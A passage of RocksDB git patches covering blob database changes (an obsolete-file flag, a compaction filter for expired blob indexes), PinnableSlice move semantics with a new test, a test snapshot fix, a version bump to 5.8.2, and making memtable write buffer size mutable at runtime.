Open(bdb_options); - // Each stored blob has an overhead of about 32 bytes currently. + // Each stored blob has an overhead of 32 bytes currently. // So a 100 byte blob should take up 132 bytes. 
std::string value(100, 'v'); ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 10)); diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index d50256ca665..bbd88572554 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -36,7 +36,7 @@ BlobFile::BlobFile() deleted_count_(0), deleted_size_(0), closed_(false), - can_be_deleted_(false), + obsolete_(false), gc_once_after_open_(false), expiration_range_({0, 0}), sequence_range_({kMaxSequenceNumber, 0}), @@ -55,7 +55,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) deleted_count_(0), deleted_size_(0), closed_(false), - can_be_deleted_(false), + obsolete_(false), gc_once_after_open_(false), expiration_range_({0, 0}), sequence_range_({kMaxSequenceNumber, 0}), @@ -64,7 +64,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) header_valid_(false) {} BlobFile::~BlobFile() { - if (can_be_deleted_) { + if (obsolete_) { std::string pn(PathName()); Status s = Env::Default()->DeleteFile(PathName()); if (!s.ok()) { @@ -110,17 +110,21 @@ std::string BlobFile::DumpState() const { "path: %s fn: %" PRIu64 " blob_count: %" PRIu64 " gc_epoch: %" PRIu64 " file_size: %" PRIu64 " deleted_count: %" PRIu64 " deleted_size: %" PRIu64 - " closed: %d can_be_deleted: %d expiration_range: (%" PRIu64 - ", %" PRIu64 ") sequence_range: (%" PRIu64 " %" PRIu64 - "), writer: %d reader: %d", + " closed: %d obsolete: %d expiration_range: (%" PRIu64 ", %" PRIu64 + ") sequence_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d", path_to_dir_.c_str(), file_number_, blob_count_.load(), gc_epoch_.load(), file_size_.load(), deleted_count_, deleted_size_, - closed_.load(), can_be_deleted_.load(), expiration_range_.first, + closed_.load(), obsolete_.load(), expiration_range_.first, expiration_range_.second, sequence_range_.first, sequence_range_.second, (!!log_writer_), (!!ra_file_reader_)); return str; } +void BlobFile::MarkObsolete(SequenceNumber sequence) { + obsolete_sequence_ = sequence; + obsolete_.store(true); +} + bool BlobFile::NeedsFsync(bool hard, uint64_t bytes_per_sync) const { assert(last_fsync_ <= file_size_); return (hard) ? file_size_ > last_fsync_ diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index 455383448bb..239e8e1c541 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -63,8 +63,12 @@ class BlobFile { std::atomic closed_; // has a pass of garbage collection successfully finished on this file - // can_be_deleted_ still needs to do iterator/snapshot checks - std::atomic can_be_deleted_; + // obsolete_ still needs to do iterator/snapshot checks + std::atomic obsolete_; + + // The last sequence number by the time the file was marked obsolete. + // Data in this file is visible to a snapshot taken before the sequence. + SequenceNumber obsolete_sequence_; // should this file been gc'd once to reconcile lost deletes/compactions std::atomic gc_once_after_open_; @@ -91,6 +95,8 @@ bool header_valid_; + SequenceNumber garbage_collection_finish_sequence_; + public: BlobFile(); @@ -117,7 +123,19 @@ std::string DumpState() const; // if the file has gone through GC and blobs have been relocated - bool Obsolete() const { return can_be_deleted_.load(); } + bool Obsolete() const { + assert(Immutable() || !obsolete_.load()); + return obsolete_.load(); + } + + // Mark file as obsolete by garbage collection. 
The file is not visible to + // snapshots with sequence numbers greater than or equal to the given sequence. + void MarkObsolete(SequenceNumber sequence); + + SequenceNumber GetObsoleteSequence() const { + assert(Obsolete()); + return obsolete_sequence_; + } // if the file is not taking any more appends. bool Immutable() const { return closed_.load(); } @@ -125,6 +143,8 @@ // we will assume this is atomic bool NeedsFsync(bool hard, uint64_t bytes_per_sync) const; + void Fsync(); + uint64_t GetFileSize() const { return file_size_.load(std::memory_order_acquire); } @@ -155,8 +175,6 @@ std::shared_ptr GetWriter() const { return log_writer_; } - void Fsync(); - private: std::shared_ptr OpenSequentialReader( Env* env, const DBOptions& db_options, @@ -183,8 +201,6 @@ void SetFileSize(uint64_t fs) { file_size_ = fs; } void SetBlobCount(uint64_t bc) { blob_count_ = bc; } - - void SetCanBeDeleted() { can_be_deleted_ = true; } }; } // namespace blob_db } // namespace rocksdb From 6fb56c582cc1e2faa4aa1e9a07ce0ae8cfb10508 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 2 Nov 2017 17:26:46 -0700 Subject: [PATCH 186/205] Blob DB: Add compaction filter to remove expired blob index entries Summary: After adding expiration to blob index in #3066, we are now able to add a compaction filter to clean up expired blob index entries. Closes https://github.com/facebook/rocksdb/pull/3090 Differential Revision: D6183812 Pulled By: yiwu-arbug fbshipit-source-id: 9cb03267a9702975290e758c9c176a2c03530b83 --- db/compaction_iterator.cc | 9 +- include/rocksdb/compaction_filter.h | 3 + utilities/blob_db/blob_compaction_filter.h | 78 ++++++++++++++ utilities/blob_db/blob_db.cc | 24 ++++- utilities/blob_db/blob_db_impl.cc | 2 + utilities/blob_db/blob_db_test.cc | 102 ++++++++++++++++++++- 6 files changed, 212 insertions(+), 6 deletions(-) create mode 100644 utilities/blob_db/blob_compaction_filter.h diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index 8eac637c426..ae63f04d83c 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -230,7 +230,8 @@ void CompactionIterator::NextFromInput() { #endif // ROCKSDB_LITE // apply the compaction filter to the first occurrence of the user key - if (compaction_filter_ != nullptr && ikey_.type == kTypeValue && + if (compaction_filter_ != nullptr && + (ikey_.type == kTypeValue || ikey_.type == kTypeBlobIndex) && (visible_at_tip_ || ikey_.sequence > latest_snapshot_ || ignore_snapshots_)) { // If the user has specified a compaction filter and the sequence @@ -240,11 +241,13 @@ void CompactionIterator::NextFromInput() { CompactionFilter::Decision filter; compaction_filter_value_.clear(); compaction_filter_skip_until_.Clear(); + CompactionFilter::ValueType value_type = + ikey_.type == kTypeValue ? CompactionFilter::ValueType::kValue + : CompactionFilter::ValueType::kBlobIndex; { StopWatchNano timer(env_, true); filter = compaction_filter_->FilterV2( - compaction_->level(), ikey_.user_key, - CompactionFilter::ValueType::kValue, value_, + compaction_->level(), ikey_.user_key, value_type, value_, &compaction_filter_value_, &compaction_filter_skip_until_.rep()); iter_stats_.total_filter_time += env_ != nullptr ? 
timer.ElapsedNanos() : 0; diff --git a/include/rocksdb/compaction_filter.h b/include/rocksdb/compaction_filter.h index 9a8c0318c5d..64f61a35e0c 100644 --- a/include/rocksdb/compaction_filter.h +++ b/include/rocksdb/compaction_filter.h @@ -36,6 +36,7 @@ class CompactionFilter { enum ValueType { kValue, kMergeOperand, + kBlobIndex, // used internally by BlobDB. }; enum class Decision { @@ -171,6 +172,8 @@ class CompactionFilter { bool rv = FilterMergeOperand(level, key, existing_value); return rv ? Decision::kRemove : Decision::kKeep; } + case ValueType::kBlobIndex: + return Decision::kKeep; } assert(false); return Decision::kKeep; diff --git a/utilities/blob_db/blob_compaction_filter.h b/utilities/blob_db/blob_compaction_filter.h new file mode 100644 index 00000000000..26cd188fe9c --- /dev/null +++ b/utilities/blob_db/blob_compaction_filter.h @@ -0,0 +1,78 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#pragma once +#ifndef ROCKSDB_LITE + +#include "rocksdb/compaction_filter.h" +#include "rocksdb/env.h" +#include "utilities/blob_db/blob_index.h" + +namespace rocksdb { +namespace blob_db { + +// CompactionFilter to delete expired blob index from base DB. +class BlobIndexCompactionFilter : public CompactionFilter { + public: + explicit BlobIndexCompactionFilter(uint64_t current_time) + : current_time_(current_time) {} + + virtual const char* Name() const override { + return "BlobIndexCompactionFilter"; + } + + // Filter expired blob indexes regardless of snapshots. + virtual bool IgnoreSnapshots() const override { return true; } + + virtual Decision FilterV2(int /*level*/, const Slice& /*key*/, + ValueType value_type, const Slice& value, + std::string* /*new_value*/, + std::string* /*skip_until*/) const override { + if (value_type != kBlobIndex) { + return Decision::kKeep; + } + BlobIndex blob_index; + Status s = blob_index.DecodeFrom(value); + if (!s.ok()) { + // Unable to decode blob index. Keeping the value. 
+ return Decision::kKeep; + } + if (blob_index.HasTTL() && blob_index.expiration() <= current_time_) { + // Expired + return Decision::kRemove; + } + return Decision::kKeep; + } + + private: + const uint64_t current_time_; +}; + +class BlobIndexCompactionFilterFactory : public CompactionFilterFactory { + public: + explicit BlobIndexCompactionFilterFactory(Env* env) : env_(env) {} + + virtual const char* Name() const override { + return "BlobIndexCompactionFilterFactory"; + } + + virtual std::unique_ptr CreateCompactionFilter( + const CompactionFilter::Context& /*context*/) override { + int64_t current_time = 0; + Status s = env_->GetCurrentTime(&current_time); + if (!s.ok()) { + return nullptr; + } + assert(current_time >= 0); + return std::unique_ptr( + new BlobIndexCompactionFilter(static_cast(current_time))); + } + + private: + Env* env_; +}; + +} // namespace blob_db +} // namespace rocksdb +#endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index f763ced20cf..b278df77f3f 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -26,6 +26,7 @@ #include "table/block_builder.h" #include "util/file_reader_writer.h" #include "util/filename.h" +#include "utilities/blob_db/blob_compaction_filter.h" #include "utilities/blob_db/blob_db_impl.h" namespace rocksdb { @@ -45,6 +46,11 @@ Status BlobDB::OpenAndLoad(const Options& options, const BlobDBOptions& bdb_options, const std::string& dbname, BlobDB** blob_db, Options* changed_options) { + if (options.compaction_filter != nullptr || + options.compaction_filter_factory != nullptr) { + return Status::NotSupported("Blob DB doesn't support compaction filter."); + } + *changed_options = options; *blob_db = nullptr; @@ -63,6 +69,8 @@ Status BlobDB::OpenAndLoad(const Options& options, all_wal_filters.push_back(rw_filter); } + changed_options->compaction_filter_factory.reset( + new BlobIndexCompactionFilterFactory(options.env)); changed_options->listeners.emplace_back(fblistener); if (bdb_options.enable_garbage_collection) { changed_options->listeners.emplace_back(ce_listener); @@ -112,6 +120,11 @@ Status BlobDB::Open(const DBOptions& db_options_input, const std::vector& column_families, std::vector* handles, BlobDB** blob_db, bool no_base_db) { + if (column_families.size() != 1 || + column_families[0].name != kDefaultColumnFamilyName) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } *blob_db = nullptr; Status s; @@ -144,6 +157,15 @@ Status BlobDB::Open(const DBOptions& db_options_input, all_wal_filters.push_back(rw_filter); } + ColumnFamilyOptions cf_options(column_families[0].options); + if (cf_options.compaction_filter != nullptr || + cf_options.compaction_filter_factory != nullptr) { + return Status::NotSupported("Blob DB doesn't support compaction filter."); + } + cf_options.compaction_filter_factory.reset( + new BlobIndexCompactionFilterFactory(db_options.env)); + ColumnFamilyDescriptor cf_descriptor(kDefaultColumnFamilyName, cf_options); + // we need to open blob db first so that recovery can happen BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options); fblistener->SetImplPtr(bdb); @@ -164,7 +186,7 @@ Status BlobDB::Open(const DBOptions& db_options_input, } DB* db = nullptr; - s = DB::Open(db_options, dbname, column_families, handles, &db); + s = DB::Open(db_options, dbname, {cf_descriptor}, handles, &db); if (!s.ok()) { delete bdb; return s; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 
74676d4fa7b..6edafe1790e 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1727,6 +1727,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, GarbageCollectionWriteCallback callback(cfd, record.key, latest_seq); // If key has expired, remove it from base DB. + // TODO(yiwu): Blob indexes will be removed by BlobIndexCompactionFilter. + // We can just drop the blob record. if (no_relocation_ttl || (has_ttl && now >= record.expiration)) { gc_stats->num_deletes++; gc_stats->deleted_size += record.value_size; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 1c949356541..b036c0208fc 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -47,10 +47,15 @@ class BlobDBTest : public testing::Test { ~BlobDBTest() { Destroy(); } + Status TryOpen(BlobDBOptions bdb_options = BlobDBOptions(), + Options options = Options()) { + options.create_if_missing = true; + return BlobDB::Open(options, bdb_options, dbname_, &blob_db_); + } + void Open(BlobDBOptions bdb_options = BlobDBOptions(), Options options = Options()) { - options.create_if_missing = true; - ASSERT_OK(BlobDB::Open(options, bdb_options, dbname_, &blob_db_)); + ASSERT_OK(TryOpen(bdb_options, options)); } void Destroy() { @@ -79,6 +84,10 @@ class BlobDBTest : public testing::Test { } } + Status PutUntil(const Slice &key, const Slice &value, uint64_t expiration) { + return blob_db_->PutUntil(WriteOptions(), key, value, expiration); + } + void PutRandomWithTTL(const std::string &key, uint64_t ttl, Random *rnd, std::map *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; @@ -1122,6 +1131,95 @@ TEST_F(BlobDBTest, InlineSmallValues) { ASSERT_EQ(last_ttl_seq, ttl_file->GetSequenceRange().second); } +TEST_F(BlobDBTest, CompactionFilterNotSupported) { + class TestCompactionFilter : public CompactionFilter { + virtual const char *Name() const { return "TestCompactionFilter"; } + }; + class TestCompactionFilterFactory : public CompactionFilterFactory { + virtual const char *Name() const { return "TestCompactionFilterFactory"; } + virtual std::unique_ptr CreateCompactionFilter( + const CompactionFilter::Context & /*context*/) { + return std::unique_ptr(new TestCompactionFilter()); + } + }; + for (int i = 0; i < 2; i++) { + Options options; + if (i == 0) { + options.compaction_filter = new TestCompactionFilter(); + } else { + options.compaction_filter_factory.reset( + new TestCompactionFilterFactory()); + } + ASSERT_TRUE(TryOpen(BlobDBOptions(), options).IsNotSupported()); + delete options.compaction_filter; + } +} + +TEST_F(BlobDBTest, FilterExpiredBlobIndex) { + constexpr size_t kNumKeys = 100; + constexpr size_t kNumPuts = 1000; + constexpr uint64_t kMaxExpiration = 1000; + constexpr uint64_t kCompactTime = 500; + constexpr uint64_t kMinBlobSize = 100; + Random rnd(301); + mock_env_->set_current_time(0); + BlobDBOptions bdb_options; + bdb_options.min_blob_size = kMinBlobSize; + bdb_options.disable_background_tasks = true; + Options options; + options.env = mock_env_.get(); + Open(bdb_options, options); + + std::map data; + std::map data_after_compact; + for (size_t i = 0; i < kNumPuts; i++) { + bool is_small_value = rnd.Next() % 2; + bool has_ttl = rnd.Next() % 2; + uint64_t expiration = rnd.Next() % kMaxExpiration; + int len = is_small_value ? 
10 : 200; + std::string key = "key" + ToString(rnd.Next() % kNumKeys); + std::string value = test::RandomHumanReadableString(&rnd, len); + if (!has_ttl) { + if (is_small_value) { + std::string blob_entry; + BlobIndex::EncodeInlinedTTL(&blob_entry, expiration, value); + // Fake blob index with TTL. See what it will do. + ASSERT_GT(kMinBlobSize, blob_entry.size()); + value = blob_entry; + } + ASSERT_OK(Put(key, value)); + data_after_compact[key] = value; + } else { + ASSERT_OK(PutUntil(key, value, expiration)); + if (expiration <= kCompactTime) { + data_after_compact.erase(key); + } else { + data_after_compact[key] = value; + } + } + data[key] = value; + } + VerifyDB(data); + + mock_env_->set_current_time(kCompactTime); + // Take a snapshot before compaction. Make sure expired blob indexes are + // filtered regardless of snapshots. + const Snapshot *snapshot = blob_db_->GetSnapshot(); + // Issue manual compaction to trigger compaction filter. + ASSERT_OK(blob_db_->CompactRange(CompactRangeOptions(), + blob_db_->DefaultColumnFamily(), nullptr, + nullptr)); + blob_db_->ReleaseSnapshot(snapshot); + // Verify expired blob indexes are filtered. + std::vector versions; + GetAllKeyVersions(blob_db_, "", "", &versions); + ASSERT_EQ(data_after_compact.size(), versions.size()); + for (auto &version : versions) { + ASSERT_TRUE(data_after_compact.count(version.user_key) > 0); + } + VerifyDB(data_after_compact); +} + } // namespace blob_db } // namespace rocksdb From 17f67b5462de15693494e7e08537db652ea45b04 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 12 Oct 2017 18:19:10 -0700 Subject: [PATCH 187/205] PinnableSlice move assignment Summary: Allow `std::move(pinnable_slice)`. Closes https://github.com/facebook/rocksdb/pull/2997 Differential Revision: D6036782 Pulled By: yiwu-arbug fbshipit-source-id: 583fb0419a97e437ff530f4305822341cd3381fa --- CMakeLists.txt | 2 ++ Makefile | 4 +++ TARGETS | 1 + include/rocksdb/cleanable.h | 9 +++++ include/rocksdb/slice.h | 25 +++++++++++++ src.mk | 2 ++ table/iterator.cc | 13 +++++++ util/slice_test.cc | 70 +++++++++++++++++++++++++++++++++++++ 8 files changed, 126 insertions(+) create mode 100644 util/slice_test.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index ab2177b886e..18effaa0667 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -779,6 +779,7 @@ if(WITH_TESTS) options/options_test.cc table/block_based_filter_block_test.cc table/block_test.cc + table/cleanable_test.cc table/cuckoo_table_builder_test.cc table/cuckoo_table_reader_test.cc table/full_filter_block_test.cc @@ -801,6 +802,7 @@ if(WITH_TESTS) util/hash_test.cc util/heap_test.cc util/rate_limiter_test.cc + util/slice_test.cc util/slice_transform_test.cc util/timer_queue_test.cc util/thread_list_test.cc diff --git a/Makefile b/Makefile index 5a89f6bf79d..c5ba1012444 100644 --- a/Makefile +++ b/Makefile @@ -477,6 +477,7 @@ TESTS = \ object_registry_test \ repair_test \ env_timed_test \ + slice_test \ PARALLEL_TEST = \ backupable_db_test \ @@ -1435,6 +1436,9 @@ range_del_aggregator_test: db/range_del_aggregator_test.o db/db_test_util.o $(LI blob_db_test: utilities/blob_db/blob_db_test.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) +slice_test: util/slice_test.o $(LIBOBJECTS) $(TESTHARNESS) + $(AM_LINK) + #------------------------------------------------- # make install related stuff INSTALL_PATH ?= /usr/local diff --git a/TARGETS b/TARGETS index ac85eab93c7..c9631b25ae1 100644 --- a/TARGETS +++ b/TARGETS @@ -463,6 +463,7 @@ ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'], ['repair_test', 
'db/repair_test.cc', 'serial'], ['sim_cache_test', 'utilities/simulator_cache/sim_cache_test.cc', 'serial'], ['skiplist_test', 'memtable/skiplist_test.cc', 'serial'], + ['slice_test', 'util/slice_test.cc', 'serial'], ['slice_transform_test', 'util/slice_transform_test.cc', 'serial'], ['spatial_db_test', 'utilities/spatialdb/spatial_db_test.cc', 'serial'], ['sst_dump_test', 'tools/sst_dump_test.cc', 'serial'], diff --git a/include/rocksdb/cleanable.h b/include/rocksdb/cleanable.h index 0f45c7108ad..cd2e9425f12 100644 --- a/include/rocksdb/cleanable.h +++ b/include/rocksdb/cleanable.h @@ -25,6 +25,15 @@ class Cleanable { public: Cleanable(); ~Cleanable(); + + // No copy constructor and copy assignment allowed. + Cleanable(Cleanable&) = delete; + Cleanable& operator=(Cleanable&) = delete; + + // Move constructor and move assignment are allowed. + Cleanable(Cleanable&&); + Cleanable& operator=(Cleanable&&); + // Clients are allowed to register function/arg1/arg2 triples that // will be invoked when this iterator is destroyed. // diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index 1630803b9fd..924f1faef72 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -129,6 +129,31 @@ class PinnableSlice : public Slice, public Cleanable { PinnableSlice() { buf_ = &self_space_; } explicit PinnableSlice(std::string* buf) { buf_ = buf; } + // No copy constructor and copy assignment allowed. + PinnableSlice(PinnableSlice&) = delete; + PinnableSlice& operator=(PinnableSlice&) = delete; + + PinnableSlice(PinnableSlice&& other) { *this = std::move(other); } + + PinnableSlice& operator=(PinnableSlice&& other) { + if (this != &other) { + // cleanup itself. + Reset(); + + Slice::operator=(other); + Cleanable::operator=(std::move(other)); + pinned_ = other.pinned_; + if (!pinned_ && other.buf_ == &other.self_space_) { + self_space_ = std::move(other.self_space_); + buf_ = &self_space_; + data_ = buf_->data(); + } else { + buf_ = other.buf_; + } } return *this; } + inline void PinSlice(const Slice& s, CleanupFunction f, void* arg1, void* arg2) { assert(!pinned_); diff --git a/src.mk b/src.mk index 30012d11f56..bb08721df95 100644 --- a/src.mk +++ b/src.mk @@ -301,6 +301,7 @@ MAIN_SOURCES = \ options/options_test.cc \ table/block_based_filter_block_test.cc \ table/block_test.cc \ + table/cleanable_test.cc \ table/cuckoo_table_builder_test.cc \ table/cuckoo_table_reader_test.cc \ table/full_filter_block_test.cc \ @@ -325,6 +326,7 @@ MAIN_SOURCES = \ util/filelock_test.cc \ util/log_write_bench.cc \ util/rate_limiter_test.cc \ + util/slice_test.cc \ util/slice_transform_test.cc \ util/timer_queue_test.cc \ util/thread_list_test.cc \ diff --git a/table/iterator.cc b/table/iterator.cc index 23a84b59e0f..ed6a2cdea44 100644 --- a/table/iterator.cc +++ b/table/iterator.cc @@ -21,6 +21,19 @@ Cleanable::Cleanable() { Cleanable::~Cleanable() { DoCleanup(); } +Cleanable::Cleanable(Cleanable&& other) { + *this = std::move(other); +} + +Cleanable& Cleanable::operator=(Cleanable&& other) { + if (this != &other) { + cleanup_ = other.cleanup_; + other.cleanup_.function = nullptr; + other.cleanup_.next = nullptr; + } + return *this; +} + // If the entire linked list was on heap we could have simply add attach one // link list to another. 
However the head is an embeded object to avoid the cost // of creating objects for most of the use cases when the Cleanable has only one diff --git a/util/slice_test.cc b/util/slice_test.cc new file mode 100644 index 00000000000..308e1c312ff --- /dev/null +++ b/util/slice_test.cc @@ -0,0 +1,70 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#include "port/stack_trace.h" +#include "rocksdb/slice.h" +#include "util/testharness.h" + +namespace rocksdb { + +class SliceTest : public testing::Test {}; + +namespace { +void BumpCounter(void* arg1, void* arg2) { + (*reinterpret_cast(arg1))++; +} +} // anonymous namespace + +TEST_F(SliceTest, PinnableSliceMoveConstruct) { + for (int i = 0; i < 3; i++) { + int orig_cleanup = 0; + int moved_cleanup = 0; + PinnableSlice* s1 = nullptr; + std::string external_storage; + switch (i) { + case 0: + s1 = new PinnableSlice(); + *(s1->GetSelf()) = "foo"; + s1->PinSelf(); + s1->RegisterCleanup(BumpCounter, &moved_cleanup, nullptr); + break; + case 1: + s1 = new PinnableSlice(&external_storage); + *(s1->GetSelf()) = "foo"; + s1->PinSelf(); + s1->RegisterCleanup(BumpCounter, &moved_cleanup, nullptr); + break; + case 2: + s1 = new PinnableSlice(); + s1->PinSlice("foo", BumpCounter, &moved_cleanup, nullptr); + break; + } + ASSERT_EQ("foo", s1->ToString()); + PinnableSlice* s2 = new PinnableSlice(); + s2->PinSelf("bar"); + ASSERT_EQ("bar", s2->ToString()); + s2->RegisterCleanup(BumpCounter, &orig_cleanup, nullptr); + *s2 = std::move(*s1); + ASSERT_EQ("foo", s2->ToString()); + ASSERT_EQ(1, orig_cleanup); + ASSERT_EQ(0, moved_cleanup); + delete s1; + // ASAN will check if it will access storage of s1, which is deleted. + ASSERT_EQ("foo", s2->ToString()); + ASSERT_EQ(1, orig_cleanup); + ASSERT_EQ(0, moved_cleanup); + delete s2; + ASSERT_EQ(1, orig_cleanup); + ASSERT_EQ(1, moved_cleanup); + } +} + +} // namespace rocksdb + +int main(int argc, char** argv) { + rocksdb::port::InstallStackTraceHandler(); + ::testing::InitGoogleTest(&argc, argv); + return RUN_ALL_TESTS(); +} From 2584a18efb2a15955084142b2d07b9ed992ec57d Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 3 Nov 2017 10:22:50 -0700 Subject: [PATCH 188/205] Blob DB: Fix BlobDBTest::SnapshotAndGarbageCollection asan failure Summary: Fix unreleased snapshot at the end of the test. 
Closes https://github.com/facebook/rocksdb/pull/3126 Differential Revision: D6232867 Pulled By: yiwu-arbug fbshipit-source-id: 651ca3144fc573ea2ab0ab20f0a752fb4a101d26 --- utilities/blob_db/blob_db_test.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index b036c0208fc..708cec5c780 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -883,6 +883,7 @@ TEST_F(BlobDBTest, SnapshotAndGarbageCollection) { if (i == 0 || i == 3 || (i == 2 && delete_key)) { // The snapshot shouldn't see data in bfile ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size()); + blob_db_->ReleaseSnapshot(snapshot); } else { // The snapshot will see data in bfile, so the file shouldn't be deleted ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size()); From 7f1815c379e5493a08624f75d44ce2a1914d64af Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 3 Nov 2017 12:25:30 -0700 Subject: [PATCH 189/205] Bump version to 5.8.2 --- HISTORY.md | 3 +++ include/rocksdb/version.h | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index e62622e081c..f8f74ca0373 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,7 @@ # Rocksdb Change Log +## 5.8.2 (11/03/2017) +No major changes. + ## 5.8.1 (10/23/2017) ### New Features * Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index 02234a2e2f3..e791dcca6e7 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 1 +#define ROCKSDB_PATCH 2 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From 9019e912549caffe77994b9dd3e55bfe0095f508 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Thu, 2 Nov 2017 22:16:23 -0700 Subject: [PATCH 190/205] dynamically change current memtable size Summary: Previously setting `write_buffer_size` with `SetOptions` would only apply to new memtables. An internal user wanted it to take effect immediately, instead of at an arbitrary future point, to prevent OOM. This PR makes the memtable's size mutable, and makes `SetOptions()` mutate it. There is one case when we preserve the old behavior, which is when memtable prefix bloom filter is enabled and the user is increasing the memtable's capacity. That's because the prefix bloom filter's size is fixed and wouldn't work as well on a larger memtable. 
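As a usage sketch of the new behavior (the helper name, the 64KB figure, and the assumption of an already-open DB are illustrative, not part of the patch; SetOptions itself is used the same way in the db_test.cc hunk below):

#include <cassert>
#include "rocksdb/db.h"

// Shrink the write buffer at runtime. With this patch the change applies to
// the live memtable, so a memtable already above the new limit becomes
// eligible for flush on the next write instead of at some future point.
void ShrinkWriteBuffer(rocksdb::DB* db) {
  rocksdb::Status s = db->SetOptions({{"write_buffer_size", "65536"}});
  assert(s.ok());
}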
Closes https://github.com/facebook/rocksdb/pull/3119 Differential Revision: D6228304 Pulled By: ajkr fbshipit-source-id: e44bd9d10a5f8c9d8c464bf7436070bb3eafdfc9 --- db/column_family.cc | 7 +++++++ db/db_test.cc | 22 +++++++++++++++++----- db/memtable.cc | 25 +++++++++++++------------ db/memtable.h | 29 ++++++++++++++++++++++------- db/write_batch.cc | 4 ++-- 5 files changed, 61 insertions(+), 26 deletions(-) diff --git a/db/column_family.cc b/db/column_family.cc index b00eda0747d..6fd07878470 100644 --- a/db/column_family.cc +++ b/db/column_family.cc @@ -930,6 +930,13 @@ SuperVersion* ColumnFamilyData::InstallSuperVersion( super_version_ = new_superversion; ++super_version_number_; super_version_->version_number = super_version_number_; + if (old_superversion != nullptr) { + if (old_superversion->mutable_cf_options.write_buffer_size != + mutable_cf_options.write_buffer_size) { + mem_->UpdateWriteBufferSize(mutable_cf_options.write_buffer_size); + } + } + // Reset SuperVersions cached in thread local storage ResetThreadLocalSuperVersions(); diff --git a/db/db_test.cc b/db/db_test.cc index fddb7aea6d0..193101d460d 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -3347,11 +3347,23 @@ TEST_F(DBTest, DynamicMemtableOptions) { {"write_buffer_size", "131072"}, })); - // The existing memtable is still 64KB in size, after it becomes immutable, - // the next memtable will be 128KB in size. Write 256KB total, we should - // have a 64KB L0 file, a 128KB L0 file, and a memtable with 64KB data - gen_l0_kb(256); - ASSERT_EQ(NumTableFilesAtLevel(0), 2); // (A) + // The existing memtable inflated 64KB->128KB when we invoked SetOptions(). + // Write 192KB, we should have a 128KB L0 file and a memtable with 64KB data. + gen_l0_kb(192); + ASSERT_EQ(NumTableFilesAtLevel(0), 1); // (A) + ASSERT_LT(SizeAtLevel(0), k128KB + 2 * k5KB); + ASSERT_GT(SizeAtLevel(0), k128KB - 4 * k5KB); + + // Decrease buffer size below current usage + ASSERT_OK(dbfull()->SetOptions({ + {"write_buffer_size", "65536"}, + })); + // The existing memtable became eligible for flush when we reduced its + // capacity to 64KB. Two keys need to be added to trigger flush: first causes + // memtable to be marked full, second schedules the flush. Then we should have + // a 128KB L0 file, a 64KB L0 file, and a memtable with just one key. 
